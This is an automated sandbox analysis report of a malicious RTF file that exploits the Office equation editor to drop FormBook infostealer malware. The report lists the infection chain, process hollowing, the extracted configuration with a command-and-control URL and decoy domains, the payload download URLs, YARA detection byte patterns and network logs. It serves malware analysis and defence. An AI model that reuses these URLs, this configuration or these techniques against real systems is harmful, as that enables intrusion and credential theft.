Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf

Overview

General Information

Sample Name:SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf
Analysis ID:1345774
MD5:db71e76c281983819c7259fd25618513
SHA1:cfbeb69bdcf67546aafabb4dfe72ad4cbec77ec3
SHA256:ddbd4b7c13d365eb339aad4d0e2deb0dff4b50287d5111f57ca8756f3746f940
Tags:rtf
Infos:

Detection

FormBook, NSISDropper
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected NSISDropper
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2408 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 3148 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: B08C02AB269D1406728178E62017C3D4)
      • twbcaze.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" MD5: 9C416E56B341D900E2DFEC7595CC85EE)
        • twbcaze.exe (PID: 3172 cmdline: C:\Users\user\AppData\Local\Temp\twbcaze.exe MD5: 9C416E56B341D900E2DFEC7595CC85EE)
          • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • cmstp.exe (PID: 3216 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 00263CA2071DC9A6EE577EB356B0D1D9)
              • cmd.exe (PID: 3240 cmdline: /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 3340 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.guimisha.com/t2ti/"], "decoy": ["j6y.lat", "kindlekidz.com", "studio352events.com", "merelweb.com", "6061k.vip", "iuk242.com", "tiltedjava.net", "importmotorshickory.com", "codinnotech.com", "foodapartcupboardscript.click", "donovanmanuel.store", "michealwilshire.online", "clawenterprises.net", "spacecargo.net", "duadqps.com", "allamericanshuttlellc.com", "shucaimh.com", "qivovrj.com", "infynite1.net", "albertcolet.com", "millennium-project.net", "fxzx01.icu", "motenm.com", "cloudsolution.site", "buddyurns.com", "vxjmolopbsma.com", "cleanwipe.shop", "serviamcounseling.com", "brandonjamescreative.com", "ricohdealers.com", "fixthecat.com", "sanqiantongpao.com", "techsterverse.life", "gzshbsh.net", "abbeyannieretreat.com", "zzw.bet", "alishopogolic.com", "whoops.store", "tike-taka.com", "kaaatieharvey.com", "eresloquebebes.com", "saferspaces.net", "maxwebmarketingdigital.com", "90phutv.live", "prescribedaddiction.com", "office-honu.com", "maquibotanic.com", "www32561b.com", "allsectors.net", "hhmhhhbh.xyz", "werks.dev", "ssongg10292.cfd", "lezhiyunfu.net", "xazeyu.net", "millennialsbloghub.com", "hupkeo.link", "doconomist.net", "onlygiftkits.com", "earthdatascape.com", "3gnz.com", "janenas.top", "shoes-fl.com", "xdeh02h.xyz", "smartsettlesolutions.com"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x82:$obj2: \objdata
  • 0x68:$obj3: \objupdate
  • 0x43:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 36 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.twbcaze.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.twbcaze.exe.400000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.twbcaze.exe.400000.1.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          7.2.twbcaze.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          7.2.twbcaze.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.224.247.210, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1668, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1668, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\balokarat2.1[1].exe

          Snort Signatures

          Timestamp:192.168.2.22103.224.247.21049161802021697 11/21/23-13:25:55.147417
          SID:2021697
          Source Port:49161
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22107.164.111.10149165802031412 11/21/23-13:26:55.450467
          SID:2031412
          Source Port:49165
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.223.33.130.19049166802031412 11/21/23-13:27:15.263664
          SID:2031412
          Source Port:49166
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.janenas.top/t2ti/Avira URL Cloud: Label: phishing
          Source: http://www.albertcolet.com/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.xazeyu.net/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.hhmhhhbh.xyzAvira URL Cloud: Label: malware
          Source: http://www.maquibotanic.com/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.hhmhhhbh.xyz/t2ti/www.techsterverse.lifeAvira URL Cloud: Label: phishing
          Source: http://www.xazeyu.net/t2ti/www.fxzx01.icuAvira URL Cloud: Label: malware
          Source: http://www.6061k.vip/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g==Avira URL Cloud: Label: malware
          Source: http://www.shucaimh.com/t2ti/www.6061k.vipAvira URL Cloud: Label: malware
          Source: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeAvira URL Cloud: Label: malware
          Source: http://www.janenas.top/t2ti/www.alishopogolic.comAvira URL Cloud: Label: phishing
          Source: http://www.allamericanshuttlellc.com/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.shucaimh.com/t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMfAvira URL Cloud: Label: malware
          Source: http://www.6061k.vip/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.albertcolet.com/t2ti/www.guimisha.comAvira URL Cloud: Label: malware
          Source: http://www.6061k.vip/t2ti/www.xazeyu.netAvira URL Cloud: Label: malware
          Source: https://swamini.in/Avira URL Cloud: Label: malware
          Source: http://www.techsterverse.life/t2ti/www.www32561b.comAvira URL Cloud: Label: malware
          Source: http://www.guimisha.com/t2ti/www.ssongg10292.cfdAvira URL Cloud: Label: malware
          Source: http://www.hhmhhhbh.xyz/t2ti/Avira URL Cloud: Label: phishing
          Source: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeqqC:Avira URL Cloud: Label: malware
          Source: http://www.spacecargo.net/t2ti/www.michealwilshire.onlineAvira URL Cloud: Label: malware
          Source: http://www.alishopogolic.com/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.guimisha.com/t2ti/Avira URL Cloud: Label: malware
          Source: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeemC:Avira URL Cloud: Label: malware
          Source: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exejAvira URL Cloud: Label: malware
          Source: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeAvira URL Cloud: Label: malware
          Source: http://www.michealwilshire.online/t2ti/www.janenas.topAvira URL Cloud: Label: malware
          Source: http://www.www32561b.com/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.fxzx01.icu/t2ti/Avira URL Cloud: Label: malware
          Source: www.guimisha.com/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.techsterverse.life/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.shucaimh.com/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.fxzx01.icu/t2ti/www.albertcolet.comAvira URL Cloud: Label: malware
          Source: http://www.www32561b.com/t2ti/www.spacecargo.netAvira URL Cloud: Label: malware
          Source: http://www.spacecargo.net/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.alishopogolic.com/t2ti/www.maquibotanic.comAvira URL Cloud: Label: malware
          Source: http://www.allamericanshuttlellc.com/t2ti/www.shucaimh.comAvira URL Cloud: Label: malware
          Source: http://www.michealwilshire.online/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.ssongg10292.cfd/t2ti/Avira URL Cloud: Label: malware
          Source: http://www.ssongg10292.cfd/t2ti/www.hhmhhhbh.xyzAvira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.guimisha.com/t2ti/"], "decoy": ["j6y.lat", "kindlekidz.com", "studio352events.com", "merelweb.com", "6061k.vip", "iuk242.com", "tiltedjava.net", "importmotorshickory.com", "codinnotech.com", "foodapartcupboardscript.click", "donovanmanuel.store", "michealwilshire.online", "clawenterprises.net", "spacecargo.net", "duadqps.com", "allamericanshuttlellc.com", "shucaimh.com", "qivovrj.com", "infynite1.net", "albertcolet.com", "millennium-project.net", "fxzx01.icu", "motenm.com", "cloudsolution.site", "buddyurns.com", "vxjmolopbsma.com", "cleanwipe.shop", "serviamcounseling.com", "brandonjamescreative.com", "ricohdealers.com", "fixthecat.com", "sanqiantongpao.com", "techsterverse.life", "gzshbsh.net", "abbeyannieretreat.com", "zzw.bet", "alishopogolic.com", "whoops.store", "tike-taka.com", "kaaatieharvey.com", "eresloquebebes.com", "saferspaces.net", "maxwebmarketingdigital.com", "90phutv.live", "prescribedaddiction.com", "office-honu.com", "maquibotanic.com", "www32561b.com", "allsectors.net", "hhmhhhbh.xyz", "werks.dev", "ssongg10292.cfd", "lezhiyunfu.net", "xazeyu.net", "millennialsbloghub.com", "hupkeo.link", "doconomist.net", "onlygiftkits.com", "earthdatascape.com", "3gnz.com", "janenas.top", "shoes-fl.com", "xdeh02h.xyz", "smartsettlesolutions.com"]}
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfReversingLabs: Detection: 48%
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfVirustotal: Detection: 55%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sample
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfAvira: detected
          Multi AV Scanner detection for domain / URL
          Source: swamini.inVirustotal: Detection: 18%Perma Link
          Source: https://swamini.in/Virustotal: Detection: 14%Perma Link
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeJoe Sandbox ML: detected

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Office equation editor establishes network connection
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 103.224.247.210 Port: 80Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 103.224.247.210 Port: 443Jump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 103.224.247.210:443 -> 192.168.2.22:49162 version: TLS 1.2
          Source: Binary string: wntdll.pdb source: twbcaze.exe, twbcaze.exe, 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000003.353742446.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000003.353487923.0000000000430000.00000004.00000020.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000002.363230284.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000009.00000003.363443838.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879405399.0000000002030000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.363187187.0000000001BC0000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: twbcaze.exe, 00000007.00000002.363156888.00000000002A0000.00000040.10000000.00040000.00000000.sdmp, twbcaze.exe, 00000007.00000002.363191563.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879251773.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405E93 FindFirstFileA,FindClose,5_2_00405E93
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004054BD
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402671 FindFirstFileA,5_2_00402671
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_004203E8 _free,_free,FindFirstFileExW,6_2_004203E8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0042049C FindFirstFileExW,FindNextFileW,FindClose,6_2_0042049C
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
          Source: global trafficTCP traffic: 103.224.247.210:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
          Source: global trafficTCP traffic: 103.224.247.210:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
